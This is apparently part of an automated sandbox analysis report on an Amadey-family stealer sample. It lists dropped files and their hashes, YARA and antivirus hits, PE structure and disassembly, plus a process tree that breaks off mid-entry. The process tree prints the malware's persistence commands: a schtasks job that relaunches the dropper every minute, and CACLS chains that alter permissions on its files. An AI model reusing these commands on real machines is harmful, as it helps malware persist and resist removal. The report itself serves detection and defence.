                                                              SHA-512:D514F35E62A5380B4AD96A3E0CDDF82B53B1CF273E5AC542F040F30A75EFD3C246FA2194E4BB273572CD2436A435A608E2B919F6DF9FA4EBBF452B0D297B0CF9
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: Joe Security
                                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dll, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                              • Antivirus: Virustotal, Detection: 76%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                              Process:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                              Category:dropped
                                                              Size (bytes):106998
                                                              Entropy (8bit):7.931081347539571
                                                              Encrypted:false
                                                              SSDEEP:3072:AaS3c0TNQHdOKX1TNrpF4RNpMwAwip0R+x0jZo88oH:FS3T+IKX1TFeNpMwAppu+x0jSIH
                                                              MD5:AA417810BB1B315B4C98F34E9C818EBF
                                                              SHA1:8C2E51236436389FEE349609CD927FFFE3EBE33E
                                                              SHA-256:A3D34F284B9BE068B15587E25ADDBC6FAFCF19830F63FBACC664D9C4227471C5
                                                              SHA-512:0FBC38A22C0EEB72BD550DFC5DB37C048C582D39B186371A5A25F4B101B5B358857E41EA84DADF1DBEF0DD6EF365472ADFFD5E22AC0C2A12635FC72B00B9313C
                                                              Malicious:false
                                                              Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):431104
                                                              Entropy (8bit):6.164008559136768
                                                              Encrypted:false
                                                              SSDEEP:6144:a9pGLNufx0o4GxBVragEIMG4rBBjG76EJXvHXhh6K9W9YGhFded89kTt:aWJufiJGxRlMG56KJIK9W9Vhmac
                                                              MD5:2365CD5930C2845769177B920D4B8AD6
                                                              SHA1:1246C7F15B215BF1ECC70294434CCD19A1778DAF
                                                              SHA-256:77BFC0F4BF45082FC3C52C3C10D4394D925C116FDA4B3EDA7F09151A57AD4010
                                                              SHA-512:D0CE6DB1B428862BDAD3BE0C7CAFC0987A0B39E7A62FFA14222BA635ECB1C3830D53E6413615637A640599FE5A453898A1B42EDC872D06F49184B0A6F3265669
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L...\q.b.................n...R.......p............@.................................l........................................s..<.... ..............................................................0I..@............................................text...Vm.......n.................. ..`.data...D|.......N...r..............@....sapara.............................@..@.dinol..p...........................@..@.rsrc........ ......................@..@.reloc..l............v..............@..B................................................................................................................................................................................................................................................................................................
                                                              Process:C:\Users\user\Desktop\file.exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              Process:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):129024
                                                              Entropy (8bit):6.511981065302762
                                                              Encrypted:false
                                                              SSDEEP:3072:Yx7pOYzBek53tiINwyP7XSSJds3zhrjPcnqULv4i9:Yx7ZNh53vwyOztPc3L
                                                              MD5:C0FD0167E213B6148333351BD16ED1FB
                                                              SHA1:1CFB2B42686557656DEAD53E02D1DB3F2A848026
                                                              SHA-256:C7D804E8FB096769B0E199102BDF8EFA97DFAE1A9B57A479819971146877368B
                                                              SHA-512:D514F35E62A5380B4AD96A3E0CDDF82B53B1CF273E5AC542F040F30A75EFD3C246FA2194E4BB273572CD2436A435A608E2B919F6DF9FA4EBBF452B0D297B0CF9
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Author: Joe Security
                                                              • Rule: INDICATOR_TOOL_PWS_Amady, Description: Detects password stealer DLL. Dropped by Amadey, Source: C:\Users\user\AppData\Roaming\85f469ce401df1\cred64.dll, Author: ditekSHen
                                                              Antivirus:
                                                              • Antivirus: Avira, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 88%
                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X......|.............@..........................@..........................................O.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..O...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................
                                                              Process:C:\Windows\SysWOW64\cacls.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):15
                                                              Entropy (8bit):3.240223928941852
                                                              Encrypted:false
                                                              SSDEEP:3:o3F:o1
                                                              MD5:509B054634B6DE74F111C3E646BC80FD
                                                              SHA1:99B4C0F39144A92FE42E22473A2A2552FB16BD13
                                                              SHA-256:07C7C151ADD6D955F3C876359C0E2A3A3FB0C519DD1E574413F0B68B345D8C36
                                                              SHA-512:A9C2D23947DBE09D5ECFBF6B3109F3CF8409E43176AE10C18083446EDE006E60E41C3EA2D2765036A967FC81B085D5F271686606AED4154AE45287D412CF6D40
                                                              Malicious:false
                                                              Preview:processed dir:
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.164008559136768
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:file.exe
                                                              File size:431104
                                                              MD5:2365cd5930c2845769177b920d4b8ad6
                                                              SHA1:1246c7f15b215bf1ecc70294434ccd19a1778daf
                                                              SHA256:77bfc0f4bf45082fc3c52c3c10d4394d925c116fda4b3eda7f09151a57ad4010
                                                              SHA512:d0ce6db1b428862bdad3be0c7cafc0987a0b39e7a62ffa14222ba635ecb1c3830d53e6413615637a640599fe5a453898a1b42edc872d06f49184b0a6f3265669
                                                              SSDEEP:6144:a9pGLNufx0o4GxBVragEIMG4rBBjG76EJXvHXhh6K9W9YGhFded89kTt:aWJufiJGxRlMG56KJIK9W9Vhmac
                                                              TLSH:8C94DF113284C8F2C7620E335816CBE5EA7FB46AFB286527F358775F6EB02E15962305
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L...\q.b.................n.
                                                              Icon Hash:8286dccea68c9c84
                                                              Entrypoint:0x407096
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x6207715C [Sat Feb 12 08:35:40 2022 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:0
                                                              File Version Major:5
                                                              File Version Minor:0
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:0
                                                              Import Hash:eeffe9860bc9c6507e24465b9b5239be
                                                              Instruction
                                                              call 00007F756CE8EA8Ch
                                                              jmp 00007F756CE88DEEh
                                                              mov edi, edi
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 28h
                                                              xor eax, eax
                                                              push ebx
                                                              mov ebx, dword ptr [ebp+0Ch]
                                                              push esi
                                                              mov esi, dword ptr [ebp+10h]
                                                              push edi
                                                              mov edi, dword ptr [ebp+08h]
                                                              mov byte ptr [ebp-08h], al
                                                              mov byte ptr [ebp-07h], al
                                                              mov byte ptr [ebp-06h], al
                                                              mov byte ptr [ebp-05h], al
                                                              mov byte ptr [ebp-04h], al
                                                              mov byte ptr [ebp-03h], al
                                                              mov byte ptr [ebp-02h], al
                                                              mov byte ptr [ebp-01h], al
                                                              cmp dword ptr [0044CC84h], eax
                                                              je 00007F756CE88F80h
                                                              push dword ptr [0044FC28h]
                                                              call 00007F756CE8D9B8h
                                                              pop ecx
                                                              jmp 00007F756CE88F77h
                                                              mov eax, 0040CC48h
                                                              mov ecx, dword ptr [ebp+14h]
                                                              mov edx, 000000A6h
                                                              cmp ecx, edx
                                                              jg 00007F756CE890EAh
                                                              je 00007F756CE890D1h
                                                              cmp ecx, 19h
                                                              jg 00007F756CE8906Eh
                                                              je 00007F756CE8905Fh
                                                              mov edx, ecx
                                                              push 00000002h
                                                              pop ecx
                                                              sub edx, ecx
                                                              je 00007F756CE89043h
                                                              dec edx
                                                              je 00007F756CE89033h
                                                              sub edx, 05h
                                                              je 00007F756CE8901Bh
                                                              dec edx
                                                              je 00007F756CE88FFCh
                                                              sub edx, 05h
                                                              je 00007F756CE88FE3h
                                                              dec edx
                                                              je 00007F756CE88FB7h
                                                              sub edx, 09h
                                                              jne 00007F756CE8914Ah
                                                              mov dword ptr [ebp-28h], 00000003h
                                                              mov dword ptr [ebp-24h], 00401348h
                                                              fld qword ptr [edi]
                                                              lea ecx, dword ptr [ebp-28h]
                                                              fstp qword ptr [ebp-20h]
                                                              push ecx
                                                              fld qword ptr [ebx]
                                                              fstp qword ptr [ebp+00h]
                                                              Programming Language:
                                                              • [C++] VS2008 build 21022
                                                              • [ASM] VS2008 build 21022
                                                              • [ C ] VS2008 build 21022
                                                              • [IMP] VS2005 build 50727
                                                              • [RES] VS2008 build 21022
                                                              • [LNK] VS2008 build 21022
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x173c40x3c.text
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x520000x1a510.rsrc
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x6d0000xda4.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x11f00x1c.text
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x49300x40.text
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000x16d560x16e00False0.5951908299180327data6.699967099151553IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .data0x180000x37c440x34e00False0.5780372709810875data5.570784865279521IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .sapara0x500000xbb80xc00False0.008138020833333334data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .dinol0x510000x2700x400False0.0166015625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .rsrc0x520000x1a5100x1a600False0.6376073755924171data6.24716016689426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .reloc0x6d0000x1c6c0x1e00False0.38958333333333334data3.882369381588875IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              NameRVASizeTypeLanguageCountry
                                                              AFX_DIALOG_LAYOUT0x6a4500x2dataSlovakSlovakia
                                                              AFX_DIALOG_LAYOUT0x6a4380x2dataSlovakSlovakia
                                                              AFX_DIALOG_LAYOUT0x6a4400xcdataSlovakSlovakia
                                                              SUXUMOWUDAKOLA0x682d00x2107ASCII text, with very long lines (8455), with no line terminatorsSlovakSlovakia
                                                              RT_CURSOR0x6a4580xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                              RT_CURSOR0x6b3000x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                              RT_CURSOR0x6bbd00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0SlovakSlovakia
                                                              RT_CURSOR0x6bd000xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0SlovakSlovakia
                                                              RT_ICON0x529900x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x530580x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x556000x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x55a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x569400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x571e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x577500x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x59cf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x5ada00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x5b7280x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x5bbf80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x5caa00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x5d3480x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x5da100x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SlovakSlovakia
                                                              RT_ICON0x5df780x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x605200x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x615c80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SlovakSlovakia
                                                              RT_ICON0x61a980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSlovakSlovakia
                                                              RT_ICON0x629400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSlovakSlovakia
                                                              RT_ICON0x631e80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSlovakSlovakia
                                                              RT_ICON0x638b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSlovakSlovakia
                                                              RT_ICON0x63e180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SlovakSlovakia
                                                              RT_ICON0x663c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SlovakSlovakia
                                                              RT_ICON0x674680x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SlovakSlovakia
                                                              RT_ICON0x67df00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SlovakSlovakia
                                                              RT_STRING0x6bfc80x546dataSlovakSlovakia
                                                              RT_ACCELERATOR0x6a3d80x40dataSlovakSlovakia
                                                              RT_GROUP_CURSOR0x6bba80x22dataSlovakSlovakia
                                                              RT_GROUP_CURSOR0x6bdb00x22dataSlovakSlovakia
                                                              RT_GROUP_ICON0x61a300x68dataSlovakSlovakia
                                                              RT_GROUP_ICON0x55a680x30dataSlovakSlovakia
                                                              RT_GROUP_ICON0x5bb900x68dataSlovakSlovakia
                                                              RT_GROUP_ICON0x682580x76dataSlovakSlovakia
                                                              RT_VERSION0x6bdd80x1f0MS Windows COFF PowerPC object fileSlovakSlovakia
                                                              None0x6a4180xadataSlovakSlovakia
                                                              None0x6a4280xadataSlovakSlovakia
                                                              DLLImport
                                                              KERNEL32.dllFillConsoleOutputCharacterA, GetCPInfo, GetProfileIntW, GetSystemDefaultLCID, GetModuleHandleW, WaitNamedPipeW, TlsSetValue, GetPriorityClass, GetVolumeInformationA, LoadLibraryW, IsProcessInJob, AssignProcessToJobObject, GetCalendarInfoW, GetFileAttributesA, TransactNamedPipe, WriteConsoleW, GetVolumePathNameA, CreateJobObjectA, GetVolumeNameForVolumeMountPointA, FillConsoleOutputCharacterW, GetLastError, GetProcAddress, VirtualAlloc, EnumSystemCodePagesW, SetFileAttributesA, LoadLibraryA, WriteConsoleA, GetProcessWorkingSetSize, LocalAlloc, OpenJobObjectW, FoldStringW, FoldStringA, FindFirstChangeNotificationA, GetFileInformationByHandle, FindActCtxSectionStringW, LCMapStringW, GetConsoleAliasesW, GetFullPathNameW, HeapFree, HeapAlloc, Sleep, ExitProcess, GetStartupInfoW, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, WriteFile, GetStdHandle, GetModuleFileNameA, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlUnwind, SetHandleCount, GetFileType, GetStartupInfoA, SetFilePointer, TlsGetValue, TlsAlloc, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, InitializeCriticalSectionAndSpinCount, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RaiseException, GetConsoleOutputCP, MultiByteToWideChar, SetStdHandle, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, CreateFileA, GetModuleHandleA, HeapSize, GetLocaleInfoA, LCMapStringA, GetStringTypeA, GetStringTypeW, SetEndOfFile, GetProcessHeap, ReadFile
                                                              ADVAPI32.dllBackupEventLogW
                                                              Language of compilation systemCountry where language is spokenMap
                                                              SlovakSlovakia
                                                              No network behavior found

                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:10:32:01
                                                              Start date:09/12/2022
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\Desktop\file.exe
                                                              Imagebase:0x400000
                                                              File size:431104 bytes
                                                              MD5 hash:2365CD5930C2845769177B920D4B8AD6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.314114177.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.314298922.00000000006E3000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.311169503.0000000000650000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.314200617.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              Reputation:low

                                                              Target ID:1
                                                              Start time:10:32:08
                                                              Start date:09/12/2022
                                                              Path:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe"
                                                              Imagebase:0x400000
                                                              File size:431104 bytes
                                                              MD5 hash:2365CD5930C2845769177B920D4B8AD6
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000001.00000003.326614950.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Antivirus matches:
                                                              • Detection: 100%, Joe Sandbox ML
                                                              Reputation:low

                                                              Target ID:2
                                                              Start time:10:32:14
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe" /F
                                                              Imagebase:0x11d0000
                                                              File size:185856 bytes
                                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:3
                                                              Start time:10:32:15
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7c72c0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:4
                                                              Start time:10:32:15
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\9c69749b54" /P "user:N"&&CACLS "..\9c69749b54" /P "user:R" /E&&Exit
                                                              Imagebase:0xd90000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:5
                                                              Start time:10:32:16
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff7c72c0000
                                                              File size:625664 bytes
                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:6
                                                              Start time:10:32:17
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              Imagebase:0xd90000
                                                              File size:232960 bytes
                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high

                                                              Target ID:7
                                                              Start time:10:32:18
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cacls.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:CACLS "gntuud.exe" /P "user:N"
                                                              Imagebase:0xb50000
                                                              File size:27648 bytes
                                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Target ID:8
                                                              Start time:10:32:18
                                                              Start date:09/12/2022
                                                              Path:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:C:\Users\user\AppData\Local\Temp\9c69749b54\gntuud.exe
                                                              Imagebase:0x7ff7c72c0000
                                                              File size:431104 bytes
                                                              MD5 hash:2365CD5930C2845769177B920D4B8AD6
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000008.00000002.385428058.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.384447242.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000008.00000002.385361747.000000000061B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.383588182.0000000000990000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                              Reputation:low

                                                              Target ID:9
                                                              Start time:10:32:19
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cacls.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:CACLS "gntuud.exe" /P "user:R" /E
                                                              Imagebase:0xb50000
                                                              File size:27648 bytes
                                                              MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:moderate

                                                              Target ID:10
                                                              Start time:10:32:19
                                                              Start date:09/12/2022
                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                              Wow64 process (32bit):true
